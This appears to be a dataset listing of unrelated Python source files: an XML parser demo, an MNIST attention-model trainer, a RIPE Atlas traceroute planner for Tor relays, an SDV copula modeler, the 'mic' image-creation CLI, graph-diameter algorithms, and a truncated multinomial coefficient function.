text
stringlengths 8
6.05M
|
|---|
import xml.dom.minidom
DOMTree = xml.dom.minidom.parse("movies.xml") # 打开xml文件
collection = DOMTree.documentElement # 获得文档元素对象
movies = collection.getElementsByTagName("movie") # 获取节点的一组标签,返回的是一个数组
print(movies[0].getAttribute("title"))
type = collection.getElementsByTagName("type")
item = type[0]
print(item.firstChild.data)
def getxmlvalue(nodename=None, file=None, n=0):
file = xml.dom.minidom.parse(file)
DOMTree = file.documentElement
itemlist = DOMTree.getElementsByTagName(nodename)
item = itemlist[n]
return item.firstChild.data
def getxmlattr(parentname=None, childname=None, file=None, n=0):
file = xml.dom.minidom.parse(file)
DOMTree = file.documentElement
itemlist = DOMTree.getElementsByTagName(parentname)
item = itemlist[n]
return item.getAttribute(childname)
print(getxmlvalue("type", "movies.xml"))
print(getxmlattr("type", "nick", "movies.xml"))
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# File: mnist_center.py
# Author: Qian Ge <geqian1001@gmail.com>
import sys
import numpy as np
import tensorflow as tf
import platform
import scipy.misc
import argparse
sys.path.append('../')
from lib.dataflow.mnist import MNISTData
from lib.model.ram import RAMClassification
from lib.helper.trainer import Trainer
DATA_PATH = '/home/qge2/workspace/data/MNIST_data/'
SAVE_PATH = '/home/qge2/workspace/data/out/ram/'
RESULT_PATH = '/home/qge2/workspace/data/out/ram/'
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument('--predict', action='store_true',
help='Run prediction')
parser.add_argument('--train', action='store_true',
help='Train the model')
parser.add_argument('--test', action='store_true',
help='Test')
parser.add_argument('--trans', action='store_true',
help='Transform image')
parser.add_argument('--center', action='store_true',
help='Center')
parser.add_argument('--step', type=int, default=1,
help='Number of glimpse')
parser.add_argument('--sample', type=int, default=1,
help='Number of location samples during training')
parser.add_argument('--glimpse', type=int, default=12,
help='Glimpse base size')
parser.add_argument('--batch', type=int, default=128,
help='Batch size')
parser.add_argument('--epoch', type=int, default=1000,
help='Max number of epoch')
parser.add_argument('--load', type=int, default=100,
help='Load pretrained parameters with id')
parser.add_argument('--lr', type=float, default=1e-3,
help='Init learning rate')
parser.add_argument('--std', type=float, default=0.11,
help='std of location')
parser.add_argument('--pixel', type=int, default=26,
help='unit_pixel')
parser.add_argument('--scale', type=int, default=3,
help='scale of glimpse')
return parser.parse_args()
class config_center():
step = 6
sample = 1
glimpse = 8
n_scales = 1
batch = 128
epoch = 1000
loc_std = 0.03
unit_pixel = 12
class config_transform():
step = 6
sample = 1
glimpse = 12
n_scales = 3
batch = 128
epoch = 2000
loc_std = 0.03
unit_pixel = 26
if __name__ == '__main__':
FLAGS = get_args()
if FLAGS.trans:
name = 'trans'
config = config_transform()
elif FLAGS.center:
name = 'centered'
config = config_center()
else:
FLAGS.trans = True
name = 'custom'
class config_FLAGS():
step = FLAGS.step
sample = FLAGS.sample
glimpse = FLAGS.glimpse
n_scales = FLAGS.scale
batch = FLAGS.batch
epoch = FLAGS.epoch
loc_std = FLAGS.std
unit_pixel = FLAGS.pixel
config = config_FLAGS()
train_data = MNISTData('train', data_dir=DATA_PATH, shuffle=True)
train_data.setup(epoch_val=0, batch_size=config.batch)
valid_data = MNISTData('val', data_dir=DATA_PATH, shuffle=True)
valid_data.setup(epoch_val=0, batch_size=10)
model = RAMClassification(
im_channel=1,
glimpse_base_size=config.glimpse,
n_glimpse_scale=config.n_scales,
n_loc_sample=config.sample,
n_step=config.step,
n_class=10,
max_grad_norm=5.0,
unit_pixel=config.unit_pixel,
loc_std=config.loc_std,
is_transform=FLAGS.trans)
model.create_model()
trainer = Trainer(model, train_data, init_lr=FLAGS.lr)
writer = tf.summary.FileWriter(SAVE_PATH)
saver = tf.train.Saver()
sessconfig = tf.ConfigProto()
sessconfig.gpu_options.allow_growth = True
with tf.Session(config=sessconfig) as sess:
sess.run(tf.global_variables_initializer())
if FLAGS.train:
writer.add_graph(sess.graph)
for step in range(0, config.epoch):
trainer.train_epoch(sess, summary_writer=writer)
trainer.valid_epoch(sess, valid_data, config.batch)
saver.save(sess,
'{}ram-{}-mnist-step-{}'
.format(SAVE_PATH, name, config.step),
global_step=step)
writer.close()
if FLAGS.predict:
valid_data.setup(epoch_val=0, batch_size=20)
saver.restore(sess,
'{}ram-{}-mnist-step-6-{}'
.format(SAVE_PATH, name, FLAGS.load))
batch_data = valid_data.next_batch_dict()
trainer.test_batch(
sess,
batch_data,
unit_pixel=config.unit_pixel,
size=config.glimpse,
scale=config.n_scales,
save_path=RESULT_PATH)
|
import json
import logging
from datetime import datetime
import os
from ipaddress import ip_address
MAX_ELEMENTS_PER_CASE = 1000
CHUNK_SIZE = 30 # Because 100 is the limit, and some do not finish, 30 are for sure free
COST_PER_TRACEROUTE = 20 # Because OneOff = True
def template_measurement():
return {
"definitions": [],
"probes": [],
"is_oneoff": True
}
def template_definition(ip_version="ipv4"):
return {
"target": "TARGET",
"description": "DESCRIPTION",
"type": "traceroute",
"af": 6 if ip_version == "ipv6" else 4,
"is_public": True,
"protocol": "ICMP",
"response_timeout": 20000,
"is_oneoff": True,
"packets": 1 # Just use one packet to have less costs
}
def template_probe_list():
return {
"requested": 1,
"type": "probes",
"value": "PROBESLIST" # Enter Probes here
}
def template_probe_asn():
return {
"requested": 1,
"type": "asn",
"value": "ASN" # Enter Probes here
}
def chunks(lst, n):
for i in range(0, len(lst), n):
yield lst[i:i + n]
def create_one_to_many(measurement_name, endpoint_set, relay_set, ip_version="ipv4"):
relay_set_items = list(relay_set.items())[:MAX_ELEMENTS_PER_CASE]
measurement_list = []
for chunked_relay_set_items in chunks(relay_set_items, CHUNK_SIZE):
measurement = template_measurement()
for asn, o in chunked_relay_set_items:
ip, separator, port = o["relays"][0]["or_addresses"].rpartition(':')
definition = template_definition(ip_version)
definition["target"] = ip.strip("[]") #strip brackets for ipv6
if port and port != "0":
definition["port"] = int(port)
definition["description"] = measurement_name
measurement["definitions"].append(definition)
probe = template_probe_list()
probe["requested"] = len(endpoint_set["probes"])
probe["value"] = ",".join(map(str, endpoint_set["probes"]))
measurement["probes"].append(probe)
measurement_list.append(measurement)
return measurement_list
def create_many_to_one(measurement_name, probe_set, endpoint_set, ip_version="ipv4"):
measurement = template_measurement()
for addrs in endpoint_set["addresses"]:
target_addrs_v4 = [addr for addr in addrs if "[" not in addr]
target_addrs_v6 = [addr for addr in addrs if "[" in addr]
target_addrs = target_addrs_v6 if ip_version == "ipv6" else target_addrs_v4
if len(target_addrs) == 0:
logging.warning(f'No target addresses found!')
continue
addr = target_addrs[0]
ip, separator, port = addr.rpartition(':')
definition = template_definition(ip_version)
definition["target"] = ip.strip("[]")
if port and port != "0":
definition["port"] = int(port)
definition["description"] = measurement_name
measurement["definitions"].append(definition)
for asn, o in probe_set.items():
probe = template_probe_asn()
probe["requested"] = 1 # Only use one probe of each AS
probe["value"] = int(asn[2:])
measurement["probes"].append(probe)
return [measurement]
def create_case1(measurement_name, c_as, g_as, ip_version="ipv4"):
return create_one_to_many(measurement_name + "-c1", c_as, g_as, ip_version)
def create_case2(measurement_name, e_as_r, d_as, ip_version="ipv4"):
return create_many_to_one(measurement_name + "-c2", e_as_r, d_as, ip_version)
def create_case3(measurement_name, d_as, e_as, ip_version="ipv4"):
return create_one_to_many(measurement_name + "-c3", d_as, e_as, ip_version)
def create_case4(measurement_name, g_as_r, c_as, ip_version="ipv4"):
return create_many_to_one(measurement_name + "-c4", g_as_r, c_as, ip_version)
def calculate_costs_for_measurement_set(measurement_set):
"""Calculate the costs of RIPE Atlas credits for the complete measurement based on the measurement set"""
ms = measurement_set
case1 = 20 * len(ms["c_as"]) * len(ms["g_as"])
case2 = 20 * len(ms["e_as_r"]) * len(ms["d_as"])
case3 = 20 * len(ms["d_as"]) * len(ms["e_as"])
case4 = 20 * len(ms["g_as_r"]) * len(ms["c_as"])
total = case1 + case2 + case3 + case4
return case1, case2, case3, case4, total
def calculate_costs_for_definition(definition):
"""
Calculate the cost of one RIPE Atlas measurement definition
This is not perfect, just: 20 * nr_definitions * requested_probes (so no packets, ...)
"""
return 20 * len(definition["definitions"]) * sum([p["requested"] for p in definition["probes"]])
def calculate_number_of_measurements(definition):
return len(definition["definitions"])
def main():
# TODO ADOPT MAIN
measurement_name = datetime.now().strftime("%Y%m%d-%H%M%S")
measurement_dir = 'ripe-measurements/' + measurement_name + "/"
os.mkdir(measurement_dir)
c_probe = [26895] # My Client
d_ip = ["1.2.3.4:80"] # Destination IP # TODO Freitag 20/12
d_probe = [12345] # TODO Freitag 20/12
c_ip = ["23.12.12.12:80"] # TODO Freitag 20/12
g_as_fp = open("run/20191221-1422/measurement-sets/g_as.json")
e_as_fp = open("run/20191221-1422/measurement-sets/e_as.json")
g_as_r_fp = open("run/20191221-1422/measurement-sets/g_as_r.json")
e_as_r_fp = open("run/20191221-1422/measurement-sets/e_as_r.json")
g_as = json.load(g_as_fp)
e_as = json.load(e_as_fp)
g_as_r = json.load(g_as_r_fp)
e_as_r = json.load(e_as_r_fp)
with open(measurement_dir+"case1.json", "w") as case4_fp:
json.dump(create_case1(measurement_name, c_probe, g_as), fp=case4_fp, indent=2)
with open(measurement_dir+"case2.json", "w") as case2_fp:
json.dump(create_case2(measurement_name, e_as_r, d_ip), fp=case2_fp, indent=2)
with open(measurement_dir+"case3.json", "w") as case3_fp:
json.dump(create_case3(measurement_name, d_probe, e_as), fp=case3_fp, indent=2)
with open(measurement_dir+"case4.json", "w") as case4_fp:
json.dump(create_case4(measurement_name, g_as_r, c_ip), fp=case4_fp, indent=2)
g_as_fp.close()
e_as_fp.close()
g_as_r_fp.close()
e_as_r_fp.close()
if __name__ == '__main__':
main()
def create_probes_set(probes, ip_version="ipv4"):
probes_per_as_v4 = dict()
probes_per_as_v6 = dict()
for p in probes["objects"]:
if p["status_name"] == "Connected":
as_ipv4 = f"AS{p['asn_v4']}"
as_ipv6 = f"AS{p['asn_v6']}"
if as_ipv4:
probes_per_as_v4.setdefault(as_ipv4, []).append(p["id"])
if as_ipv6:
probes_per_as_v6.setdefault(as_ipv6, []).append(p["id"])
return probes_per_as_v6 if ip_version == "ipv6" else probes_per_as_v4
def create_guard_set(details, ip_version):
"""Create (ii) g-as."""
return create_simple_set(details, "Guard", ip_version)
def create_exit_set(details, ip_version):
"""Create (iv) e-as."""
return create_simple_set(details, "Exit", ip_version)
def create_simple_set(details, filtr, ip_version="ipv4"):
relay_per_as_v4 = {}
relay_per_as_v6 = {}
for r in details["relays"]:
if filtr in r["flags"]:
if "as" in r:
r_addrs = r["or_addresses"]
# remove brackets at ipv6 addrs since we parse them anyway
#r_addrs = [addr.strip("[]") for addr in r_addrs]
#ipv4_addrs = [addr for addr in r_addrs if ip_address(addr).version == 4]
#ipv6_addrs = [addr for addr in r_addrs if ip_address(addr).version == 6]
ipv4_addrs = [addr for addr in r_addrs if not "[" in addr]
ipv6_addrs = [addr for addr in r_addrs if "[" in addr]
if ipv4_addrs:
relay_per_as_v4.setdefault(str(r["as"]), {"relays": []})["relays"].append({"fingerprint": r["fingerprint"],
"or_addresses":
ipv4_addrs[0]})
if ipv6_addrs:
relay_per_as_v6.setdefault(str(r["as"]), {"relays": []})["relays"].append({"fingerprint": r["fingerprint"],
"or_addresses":
ipv6_addrs[0]})
return relay_per_as_v6 if ip_version == "ipv6" else relay_per_as_v4
def create_guard_with_ripe_probes_set(details, probes, ip_version):
"""Create (iii) g-as-r."""
return create_set_with_ripe_probes(details, probes, "Guard", ip_version)
def create_exit_with_ripe_probes_set(details, probes, ip_version):
"""Create (v) e-as-r."""
return create_set_with_ripe_probes(details, probes, "Exit", ip_version)
def create_set_with_ripe_probes(details, probes, filtr, ip_version):
relay_per_as = create_simple_set(details, filtr, ip_version)
probes = create_probes_set(probes, ip_version)
as_to_delete = []
for asn in relay_per_as.keys():
if asn in probes:
relay_per_as[asn]["ids"] = probes[asn]
else:
as_to_delete.append(asn)
for asn in as_to_delete:
del relay_per_as[asn]
return relay_per_as
|
nmList=[8,60,43,55,25,134,1]
total=0
for i in nmList:
total+=i
print(total)
|
import unittest
from katas.kyu_6.regexp_basics_parsing_mana_cost import parse_mana_cost
class ParseManaCostTestCase(unittest.TestCase):
def test_equals(self):
self.assertEqual(parse_mana_cost(''), {})
def test_equals_2(self):
self.assertEqual(parse_mana_cost('0'), {})
def test_equals_3(self):
self.assertEqual(parse_mana_cost('1'), {'*': 1})
def test_equals_4(self):
self.assertEqual(parse_mana_cost('4'), {'*': 4})
def test_equals_5(self):
self.assertEqual(parse_mana_cost('15'), {'*': 15})
def test_equals_6(self):
self.assertEqual(parse_mana_cost('2rr'), {'*': 2, 'r': 2})
def test_equals_7(self):
self.assertEqual(parse_mana_cost('1wbg'),
{'*': 1, 'w': 1, 'b': 1, 'g': 1})
def test_equals_8(self):
self.assertEqual(parse_mana_cost('1WWU'), {'*': 1, 'w': 2, 'u': 1})
def test_equals_9(self):
self.assertEqual(parse_mana_cost('0r'), {'r': 1})
def test_equals_10(self):
self.assertEqual(parse_mana_cost('2R'), {'*': 2, 'r': 1})
def test_equals_11(self):
self.assertEqual(parse_mana_cost('b'), {'b': 1})
def test_none(self):
self.assertIsNone(parse_mana_cost('2x'))
def test_none_2(self):
self.assertIsNone(parse_mana_cost('2\n'))
def test_none_3(self):
self.assertIsNone(parse_mana_cost('\n2'))
|
import logging
import pickle
import numpy as np
import pandas as pd
from copulas import EPSILON, get_qualified_name
from copulas.multivariate import GaussianMultivariate, TreeTypes
from copulas.univariate import GaussianUnivariate
from rdt.transformers.positive_number import PositiveNumberTransformer
# Configure logger
logger = logging.getLogger(__name__)
DEFAULT_MODEL = GaussianMultivariate
DEFAULT_DISTRIBUTION = GaussianUnivariate
IGNORED_DICT_KEYS = ['fitted', 'distribution', 'type']
MODELLING_ERROR_MESSAGE = (
'There was an error while trying to model the database. If you are using a custom '
'distribution or model, please try again using the default ones. If the problem persist, '
'please report it here:\nhttps://github.com/HDI-Project/SDV/issues.\n'
)
class Modeler:
"""Class responsible for modeling database.
Args:
data_navigator (DataNavigator): object for the dataset.
model (type): Class of model to use.
distribution (type): Class of distribution to use. Will be deprecated shortly.
model_kwargs (dict): Keyword arguments to pass to model.
"""
DEFAULT_PRIMARY_KEY = 'GENERATED_PRIMARY_KEY'
def __init__(self, data_navigator, model=DEFAULT_MODEL, distribution=None, model_kwargs=None):
"""Instantiates a modeler object."""
self.tables = {}
self.models = {}
self.child_locs = {} # maps table->{child: col #}
self.dn = data_navigator
self.model = model
if distribution and model != DEFAULT_MODEL:
raise ValueError(
'`distribution` argument is only suported for `GaussianMultivariate` model.')
if distribution is not None:
distribution = get_qualified_name(distribution)
else:
distribution = get_qualified_name(DEFAULT_DISTRIBUTION)
if not model_kwargs:
if model == DEFAULT_MODEL:
model_kwargs = {'distribution': distribution}
else:
model_kwargs = {'vine_type': TreeTypes.REGULAR}
self.model_kwargs = model_kwargs
def save(self, file_name):
"""Saves model to file destination.
Args:
file_name (string): path to store file
"""
with open(file_name, 'wb') as output:
pickle.dump(self, output, pickle.HIGHEST_PROTOCOL)
@classmethod
def load(cls, file_name):
"""Load model from filename.
Args:
file_name (string): path of file to load
"""
with open(file_name, 'rb') as input:
return pickle.load(input)
def get_pk_value(self, pk, index, mapping):
if pk == self.DEFAULT_PRIMARY_KEY:
val = pk + str(index)
else:
val = mapping[pk]
return val
@classmethod
def _flatten_array(cls, nested, prefix=''):
"""Return a dictionary with the values of the given nested array.
Args:
nested (list, np.array): Iterable to flatten.
prefix (str): Name to append to the array indices.
Returns:
dict
"""
result = {}
for index in range(len(nested)):
prefix_key = '__'.join([prefix, str(index)]) if len(prefix) else str(index)
if isinstance(nested[index], (list, np.ndarray)):
result.update(cls._flatten_array(nested[index], prefix=prefix_key))
else:
result[prefix_key] = nested[index]
return result
@classmethod
def _flatten_dict(cls, nested, prefix=''):
"""Return a flatten dict from a nested one.
This method returns a flatten version of a dictionary, concatenating key names with
double underscores, that is:
Args:
nested (dict): Original dictionary to flatten.
prefix (str): Prefix to append to key name
Returns:
dict: Flattened dictionary. That is, all its keys hold a primitive value.
"""
result = {}
for key, value in nested.items():
prefix_key = '__'.join([prefix, str(key)]) if len(prefix) else key
if key in IGNORED_DICT_KEYS and not isinstance(value, (dict, list)):
continue
elif isinstance(value, dict):
result.update(cls._flatten_dict(value, prefix_key))
elif isinstance(value, (np.ndarray, list)):
result.update(cls._flatten_array(value, prefix_key))
else:
result[prefix_key] = value
return result
def _get_model_dict(self, data):
"""Fit and serialize a model and flatten its parameters into an array.
Args:
data(pandas.DataFrame): Dataset to fit the model to.
Returns:
dict: Flattened parameters for model.
"""
model = self.fit_model(data)
if self.model == DEFAULT_MODEL:
values = []
triangle = np.tril(model.covariance)
for index, row in enumerate(triangle.tolist()):
values.append(row[:index + 1])
model.covariance = np.array(values)
if self.model_kwargs['distribution'] == get_qualified_name(DEFAULT_DISTRIBUTION):
transformer = PositiveNumberTransformer({
'name': 'field',
'type': 'number'
})
for distribution in model.distribs.values():
column = pd.DataFrame({'field': [distribution.std]})
distribution.std = transformer.reverse_transform(column).loc[0, 'field']
return self._flatten_dict(model.to_dict())
def get_foreign_key(self, fields, primary):
"""Get foreign key from primary key.
Args:
fields (dict): metadata `fields` key for a given table.
primary (str): Name of primary key in original table.
Return:
str: Name of foreign key in current table.
"""
for field_key in fields:
field = fields[field_key]
ref = field.get('ref')
if ref and ref['field'] == primary:
foreign = field['name']
return foreign
@staticmethod
def impute_table(table):
"""Fill in any NaN values in a table.
Args:
table(pandas.DataFrame): Table to fill NaN values
Returns:
pandas.DataFrame
"""
values = {}
for column in table.loc[:, table.isnull().any()].columns:
if table[column].dtype in [np.float64, np.int64]:
value = table[column].mean()
if not pd.isnull(value or np.nan):
values[column] = value
else:
values[column] = 0
table = table.fillna(values)
# There is an issue when using KDEUnivariate modeler in tables with childs
# As the extension columns would have constant values, that make it crash
# This is a temporary fix while https://github.com/DAI-Lab/Copulas/issues/82 is solved.
first_index = table.index[0]
constant_columns = table.loc[:, (table == table.loc[first_index]).all()].columns
for column in constant_columns:
table.loc[first_index, column] = table.loc[first_index, column] + EPSILON
return table
def fit_model(self, data):
"""Returns an instance of self.model fitted with the given data.
Args:
data (pandas.DataFrame): Data to train the model with.
Returns:
model: Instance of self.model fitted with data.
"""
model = self.model(**self.model_kwargs)
model.fit(data)
return model
def _create_extension(self, foreign, transformed_child_table, table_info):
"""Return the flattened model from a dataframe.
Args:
foreign(pandas.DataFrame): Object with Index of elements from children table elements
of a given foreign_key.
transformed_child_table(pandas.DataFrame): Table of data to fil
table_info (tuple[str, str]): foreign_key and child table names.
Returns:
pd.Series or None : Parameter extension if it can be generated, None elsewhere.
"""
foreign_key, child_name = table_info
try:
child_rows = transformed_child_table.loc[foreign.index].copy()
if foreign_key in child_rows:
child_rows = child_rows.drop(foreign_key, axis=1)
except KeyError:
return None
num_child_rows = len(child_rows)
if num_child_rows:
clean_df = self.impute_table(child_rows)
extension = self._get_model_dict(clean_df)
extension['child_rows'] = num_child_rows
extension = pd.Series(extension)
extension.index = child_name + '__' + extension.index
return extension
return None
def _get_extensions(self, pk, children):
"""Generate list of extension for child tables.
Args:
pk (str): Name of the primary_key column in the parent table.
children (set[str]): Names of the children.
Returns: list(pandas.DataFrame)
Each element of the list is generated for one single children.
That dataframe should have as index.name the `foreign_key` name, and as index
it's values.
The values for a given index is generated by flattening a model fit with the related
data to that index in the children table.
"""
extensions = []
# find children that ref primary key
for child in children:
child_table = self.dn.tables[child].data
child_meta = self.dn.tables[child].meta
fields = child_meta['fields']
fk = self.get_foreign_key(fields, pk)
if not fk:
continue
# check if leaf node
if not self.dn.get_children(child):
transformed_child_table = self.dn.transformed_data[child]
else:
transformed_child_table = self.tables[child]
table_info = (fk, '__' + child)
foreign_key_values = child_table[fk].unique()
parameters = {}
for foreign_key in foreign_key_values:
foreign_index = child_table[child_table[fk] == foreign_key]
parameter = self._create_extension(
foreign_index, transformed_child_table, table_info)
if parameter is not None:
parameters[foreign_key] = parameter.to_dict()
extension = pd.DataFrame(parameters).T
extension.index.name = pk
if len(extension):
extensions.append(extension)
return extensions
def CPA(self, table):
"""Run CPA algorithm on a table.
Conditional Parameter Aggregation. It will take the table's children and generate
extensions (parameters from modelling the related children for each foreign key)
and merge them to the original `table`.
After the extensions are created, `extended_table` is modified in order for the extensions
to be merged. As the extensions are returned with an index consisting of values of the
`primary_key` of the parent table, we need to make sure that same values are present in
`extended_table`. The values couldn't be present in two situations:
- They weren't numeric, and have been transformed.
- They weren't transformed, and therefore are not present on `extended_table`
Args:
table (string): name of table.
Returns:
None
"""
logger.info('Modeling %s', table)
# Grab table
tables = self.dn.tables
# grab table from self.tables if it is not a leaf
# o.w. grab from data
children = self.dn.get_children(table)
table_meta = tables[table].meta
# get primary key
pk = table_meta.get('primary_key', self.DEFAULT_PRIMARY_KEY)
# start with transformed table
extended_table = self.dn.transformed_data[table]
extensions = self._get_extensions(pk, children)
if extensions:
original_pk = tables[table].data[pk]
transformed_pk = None
if pk in extended_table:
transformed_pk = extended_table[pk].copy()
if (pk not in extended_table) or (not extended_table[pk].equals(original_pk)):
extended_table[pk] = original_pk
# add extensions
for extension in extensions:
extended_table = extended_table.merge(extension.reset_index(), how='left', on=pk)
if transformed_pk is not None:
extended_table[pk] = transformed_pk
else:
extended_table = extended_table.drop(pk, axis=1)
self.tables[table] = extended_table
def RCPA(self, table):
"""Recursively calls CPA starting at table.
Args:
table (string): name of table to start from.
"""
children = self.dn.get_children(table)
for child in children:
self.RCPA(child)
self.CPA(table)
def model_database(self):
"""Use RCPA and store model for database."""
for table in self.dn.tables:
if not self.dn.get_parents(table):
self.RCPA(table)
for table in self.tables:
clean_table = self.impute_table(self.tables[table])
self.models[table] = self.fit_model(clean_table)
logger.info('Modeling Complete')
|
#!/usr/bin/env python
#
# Copyright (c) 2011 Intel, Inc.
#
# This program is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the Free
# Software Foundation; version 2 of the License
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
# or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
# for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc., 59
# Temple Place - Suite 330, Boston, MA 02111-1307, USA.
import os, sys, errno
from mic import msger, creator
from mic.utils import cmdln, misc, errors
from mic.conf import configmgr
from mic.plugin import pluginmgr
from mic.__version__ import VERSION
class MicCmd(cmdln.Cmdln):
"""
Usage: mic SUBCOMMAND [OPTS] [ARGS...]
mic Means the Image Creation tool
Try 'mic help SUBCOMMAND' for help on a specific subcommand.
${command_list}
global ${option_list}
${help_list}
"""
name = 'mic'
version = VERSION
def print_version(self):
msger.raw("%s %s (%s)" % (self.name,
self.version,
misc.get_distro_str()))
def get_optparser(self):
optparser = cmdln.CmdlnOptionParser(self, version=self.version)
# hook optparse print_version here
optparser.print_version = self.print_version
optparser.add_option('-d', '--debug', action='store_true',
dest='debug',
help='print debug message')
optparser.add_option('-v', '--verbose', action='store_true',
dest='verbose',
help='verbose information')
return optparser
def postoptparse(self):
if self.options.verbose:
msger.set_loglevel('verbose')
if self.options.debug:
try:
import rpm
rpm.setVerbosity(rpm.RPMLOG_NOTICE)
except ImportError:
pass
msger.set_loglevel('debug')
self.print_version()
def help_create(self):
cr = creator.Creator()
cr.optparser = cr.get_optparser()
doc = cr.__doc__
doc = cr._help_reindent(doc)
doc = cr._help_preprocess(doc, None)
doc = doc.replace(cr.name, "${cmd_name}", 1)
doc = doc.rstrip() + '\n'
return doc
@cmdln.alias("cr")
def do_create(self, argv):
try:
cr = creator.Creator()
cr.main(argv[1:])
except:
raise
def _root_confirm(self):
if os.geteuid() != 0:
msger.error('Root permission is required to continue, abort')
@cmdln.alias("cv")
@cmdln.option("-S", "--shell",
action="store_true", dest="shell", default=False,
help="Launch shell before packaging the converted image")
def do_convert(self, subcmd, opts, *args):
"""${cmd_name}: convert image format
Usage:
mic convert <imagefile> <destformat>
${cmd_option_list}
"""
if not args:
# print help
handler = self._get_cmd_handler('convert')
if hasattr(handler, "optparser"):
handler.optparser.print_help()
return 1
if len(args) == 1:
raise errors.Usage("It need 2 arguments (1 given)")
elif len(args) == 2:
(srcimg, destformat) = args
else:
raise errors.Usage("Extra argument given")
if not os.path.exists(srcimg):
raise errors.CreatorError("Cannot find the image: %s" % srcimg)
self._root_confirm()
configmgr.convert['shell'] = opts.shell
srcformat = misc.get_image_type(srcimg)
if srcformat == "ext3fsimg":
srcformat = "loop"
srcimager = None
destimager = None
for iname, icls in pluginmgr.get_plugins('imager').iteritems():
if iname == srcformat and hasattr(icls, "do_unpack"):
srcimager = icls
if iname == destformat and hasattr(icls, "do_pack"):
destimager = icls
if (srcimager and destimager) is None:
raise errors.CreatorError("Can't convert from %s to %s" \
% (srcformat, destformat))
else:
maptab = {
"livecd": "iso",
"liveusb": "usbimg",
"loop": "img",
}
if destformat in maptab:
imgname = os.path.splitext(os.path.basename(srcimg))[0]
dstname = "{0}.{1}".format(imgname, maptab[destformat])
if os.path.exists(dstname):
if msger.ask("Converted image %s seems existed, "
"remove and continue?" % dstname):
os.unlink(dstname)
else:
raise errors.Abort("Canceled")
base_on = srcimager.do_unpack(srcimg)
destimager.do_pack(base_on)
@cmdln.alias("ch")
@cmdln.option('-s', '--saveto',
action='store', dest='saveto', default=None,
help="Save the unpacked image to specified dir")
def do_chroot(self, subcmd, opts, *args):
"""${cmd_name}: chroot into an image
Usage:
mic chroot <imagefile>
${cmd_option_list}
"""
if not args:
# print help
handler = self._get_cmd_handler('chroot')
if hasattr(handler, "optparser"):
handler.optparser.print_help()
return 1
if len(args) == 1:
targetimage = args[0]
else:
raise errors.Usage("Extra argument given")
if not os.path.exists(targetimage):
raise errors.CreatorError("Cannot find the image: %s"
% targetimage)
self._root_confirm()
configmgr.chroot['saveto'] = opts.saveto
imagetype = misc.get_image_type(targetimage)
if imagetype in ("ext3fsimg", "ext4fsimg", "btrfsimg"):
imagetype = "loop"
chrootclass = None
for pname, pcls in pluginmgr.get_plugins('imager').iteritems():
if pname == imagetype and hasattr(pcls, "do_chroot"):
chrootclass = pcls
break
if not chrootclass:
raise errors.CreatorError("Cannot support image type: %s" \
% imagetype)
chrootclass.do_chroot(targetimage)
if __name__ == "__main__":
try:
mic = MicCmd()
sys.exit(mic.main())
except KeyboardInterrupt:
msger.error('\n^C catched, program aborted.')
# catch 'no space left' exception, etc
except IOError, e:
if e.errno == errno.ENOSPC:
msger.error('\nNo space left on device')
raise
except errors.Usage, usage:
msger.error(str(usage))
except errors.Abort, msg:
msger.info(str(msg))
except errors.CreatorError, err:
if msger.get_loglevel() == 'debug':
import traceback
msger.error(traceback.format_exc())
else:
msger.error('\n'+str(err))
|
from math import inf
from collections import deque
def bfs(nodo, grafo):
padri = [-1 for _ in grafo]
padri[nodo] = nodo
distanze = [inf for _ in grafo]
distanze[nodo] = 0
coda = deque([nodo])
while coda:
nodo = coda.pop()
for adiacente in grafo[nodo]:
if padri[adiacente] == -1:
distanze[adiacente] = distanze[nodo] + 1
padri[adiacente] = nodo
coda.append(adiacente)
return padri, distanze
def diametro_una_dfs(grafo):
# GRAFO CONNESSO NON DIRETTO ACICLICO (ALBERO)
def dfs(nodo):
profondita_max_1 = 0
profondita_max_2 = 0
diametro_max = 0
for adiacente in grafo[nodo]:
# Non essendoci cicli rimane da escludere il padre.
if not visitati[adiacente]:
visitati[adiacente] = True
profondita_max_adj, diametro_adj = dfs(adiacente)
if profondita_max_adj > profondita_max_1:
profondita_max_2 = profondita_max_1
profondita_max_1 = profondita_max_adj
elif profondita_max_adj > profondita_max_2:
profondita_max_2 = profondita_max_adj
if diametro_adj > diametro_max:
diametro_max = diametro_adj
# Il +1 conta il nodo in questione (se stesso).
diametro_max = max(profondita_max_1 + profondita_max_2 + 1,
diametro_max)
# Il +1 conta il nodo in questione (se stesso).
return (profondita_max_1 + 1, diametro_max)
visitati = [False for _ in grafo]
visitati[0] = True
return dfs(0)
def diametro_due_bfs(grafo):
# GRAFO CONNESSO E NON DIRETTO!
# Passi:
# 1. Effettuo la bfs da un nodo qualsiasi Y (per convenzione 0), il costo è
# di O(n + m);
# 2. Dalla BFS precedente trovo un nodo X a distanza massima da Y, la
# radice, il costo è di O(n);
# 3. Effettuo una BFS dal nodo X, il costo è di O(n + m);
# 4. Dalla BFS precedente trovo un nodo Z a distanza massima da X, la
# radice, il costo è di O(n);
# Il diametro è proprio tale distanza, i due nodi interessati sono (X, Z).
# Costo totale: O(n + m).
def max_distanza(distanze):
nodo_estremo = (-1, -1) # distanza, nodo (indice)
for nodo in range(len(distanze)):
if distanze[nodo] >= nodo_estremo[0]:
nodo_estremo = distanze[nodo], nodo
return nodo_estremo
# Passo 1.
_, distanze = bfs(0, grafo)
# Passo 2.
nodo_estremo = max_distanza(distanze)
# Passo 3.
_, distanze = bfs(nodo_estremo[1], grafo)
# Passo 4.
diametro = max_distanza(distanze)
# Aggiungo 1 al diametro perchè il nodo da cui parto non viene contato dalla
# BFS, ma in realtà andrebbe contato per il diametro.
# (diametro, nodo estremo, nodo estremo o radice)
return diametro[0] + 1, nodo_estremo[1], diametro[1]
|
from numpy import argmax
# Works out multinomial coefficient nC(k1,k2,...,km)
def multiCoeff(n, kList):
kMaxFirstPos = argmax(kList)
kMax = kList[kMaxFirstPos]
coefficient = 1
i = kMax + 1
# Perform repeated multiplication and division
# for part of kList up to the maximum
for k in kList[:kMaxFirstPos]:
for j in range(1, k + 1):
coefficient *= i
coefficient //= j
i += 1
# Perform repeated multiplication and division
# for part of kList after the maximum
for k in kList[kMaxFirstPos + 1:]:
for j in range(1, k + 1):
